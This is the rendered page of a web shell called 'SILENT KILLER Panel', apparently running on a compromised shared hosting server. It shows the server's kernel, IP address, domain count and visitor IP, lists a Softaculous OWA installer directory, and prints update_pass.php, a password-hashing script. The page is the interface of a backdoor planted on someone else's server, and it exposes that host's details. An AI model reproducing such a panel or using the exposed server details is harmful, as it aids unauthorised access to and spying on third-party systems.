SILENT KILLERPanel

Current Path: > > > var > softaculous > owa


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: ///var/softaculous/owa

NameTypeSizeLast ModifiedActions
images Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
clone.php File 6276 bytes June 23 2025 11:55:56.
edit.php File 4339 bytes June 23 2025 11:55:56.
edit.xml File 433 bytes December 23 2021 11:54:36.
fileindex.php File 595 bytes June 23 2025 11:14:32.
import.php File 3285 bytes June 23 2025 11:55:56.
info.xml File 3353 bytes June 23 2025 11:14:32.
install.js File 921 bytes December 23 2021 11:54:36.
install.php File 5616 bytes June 23 2025 11:55:56.
install.xml File 1051 bytes December 23 2021 11:54:36.
md5 File 3232 bytes June 23 2025 11:55:56.
notes.txt File 529 bytes December 23 2021 11:54:36.
owa-config.php File 2573 bytes June 12 2025 08:44:08.
owa.sql File 30808 bytes June 23 2025 11:14:32.
owa.zip File 3844969 bytes June 23 2025 11:14:32.
update_pass.php File 551 bytes December 23 2021 11:54:36.
upgrade.php File 4043 bytes June 23 2025 11:55:56.
upgrade.xml File 241 bytes December 23 2021 11:54:36.

Reading File: ///var/softaculous/owa/update_pass.php

<?php

@unlink('update_pass.php');

define('PASSWORD_BCRYPT', 1);
define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);

$resp = __encryptPassword('[[admin_pass]]');

echo '<update_pass>'.$resp.'</update_pass>';

function __encryptOldPassword($password) {

	return md5(strtolower($password).strlen($password));
}

function __encryptPassword($password) {

	// check function exists to support older PHP
	if ( function_exists('password_hash') ) {
		return password_hash( $password, PASSWORD_DEFAULT );
	} else {
		return __encryptOldPassword($password);
	}
}

?>

SILENT KILLER Tool